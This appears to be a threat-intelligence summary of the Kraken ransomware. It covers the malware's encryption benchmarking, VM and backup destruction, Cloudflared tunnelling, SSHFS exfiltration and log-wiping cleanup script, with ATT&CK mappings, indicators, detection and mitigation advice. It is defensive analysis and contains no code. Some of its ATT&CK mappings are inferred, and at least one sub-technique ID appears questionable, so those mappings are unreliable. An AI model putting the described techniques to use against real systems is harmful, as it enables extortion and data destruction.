Full Report
The Kraken ransomware, which targets Windows, Linux/VMware ESXi systems, is testing machines to check how fast it can encrypt data without overloading them. [...]
Analysis Summary
# Tool/Technique: Kraken Ransomware
## Overview
Kraken is a ransomware strain targeting both Windows and Linux/VMware ESXi systems. A notable feature is its system benchmarking capability, where it tests encryption speeds using temporary files to decide between full or partial data encryption to maximize damage without system overload. It operates under a double extortion model, incorporating data theft. Kraken is considered a continuation of the HelloKitty operation.
## Technical Details
- Type: Malware family (Ransomware)
- Platform: Windows, Linux, VMware ESXi
- Capabilities: System performance benchmarking for optimal encryption, data theft, encryption of SQL databases, network shares, and VM disks, double extortion.
- First Seen: Emerged at the beginning of the year (relative to Nov 2025 article date).
## MITRE ATT&CK Mapping
*Note: Specific TTPs are inferred from the operational details described.*
- T1486 - Data Encrypted for Impact
- T1486.002 - Encrypting System Files
- T1021 - Remote Services
- T1021.001 - Remote Desktop Protocol
- T1070 - Indicator Removal
- T1070.004 - File Deletion (removal of *bye_bye.sh* script, logs, and binary)
- T1560 - Archive Collected Data
- T1560.001 - Archive via Utility
- T1003 - OS Credential Dumping (Inferred via administrator credential extraction)
- T1041 - Exfiltration Over C2 Channel (Implied by data theft using SSHFS)
## Functionality
### Core Capabilities
* **System Benchmarking:** Creates a temporary file with random data, encrypts it in a timed operation, and uses the calculation to dynamically decide between full or partial encryption for speed and impact optimization.
* **Targeted Encryption:** Modular approach on Windows to target SQL database files, network shares, local/removable drives, and Hyper-V virtual disk files.
* **VM Targeting (Linux/ESXi):** Enumerates and forcibly terminates running virtual machines before encrypting associated disk files.
* **Persistence & Evasion:** Deletes shadow volumes and the Recycle Bin, and stops backup services before encryption begins.
### Advanced Features
* **Double Extortion:** Engages in data theft alongside encryption.
* **Reverse Tunneling:** Deploys **Cloudflared** to create reverse tunnels to attacker infrastructure for navigation and exfiltration.
* **Data Exfiltration:** Uses **SSHFS** to mount remote filesystems for data exfiltration.
* **Self-Destruction:** Executes an auto-generated `_bye_bye.sh` script on Linux systems to remove logs, shell history, the Kraken binary, and the script itself post-encryption.
## Indicators of Compromise
- File Hashes: (Not specified in the text, but stated as available on GitHub)
- File Names:
- Ransom Note: `readme_you_ws_hacked.txt`
- Linux Cleanup Script: `_bye_bye.sh`
- Registry Keys: (Used implicitly by Windows version to identify SQL instances)
- Network Indicators: (Not specified in the text, specific C2 infrastructure is implied but defanged)
- Behavioral Indicators:
* Exploitation of SMB vulnerabilities for initial access.
* Use of Remote Desktop Protocol (RDP) for lateral movement post-credential theft.
* Deployment and use of Cloudflared and SSHFS tools.
* Creation and timing of temporary files for performance assessment.
## Associated Threat Actors
* Threat actors associated with the defunct **HelloKitty** ransomware operation.
## Detection Methods
- Signature-based detection: (Requires specific signatures for Kraken binaries and ransom note strings, details not provided.)
- Behavioral detection: Monitoring for processes that benchmark disk encryption speed via temporary file manipulation, abrupt termination of VM services, or the execution of Cloudflared/SSHFS post-RDP login.
- YARA rules: (Not provided in the text.)
## Mitigation Strategies
* Ensure strong patching regimen, especially for internet-facing assets vulnerable to SMB exploitation.
* Implement strong credential management and multi-factor authentication to impede RDP usage post-compromise.
* Monitor for the execution of utility tools like Cloudflared and SSHFS by non-standard users or in anomalous sequences.
* Maintain offline/immutable backups to counter encryption and data loss.
* Implement Application Control to restrict the execution of unknown binaries or scripts designed for system destruction (like the cleanup script).
## Related Tools/Techniques
* **HelloKitty Ransomware:** Kraken is noted as a continuation/offshoot.
* **Cloudflared:** Used for reverse tunneling (often legitimate, but abused here).
* **SSHFS:** Used for mounting filesystems/exfiltration (abused).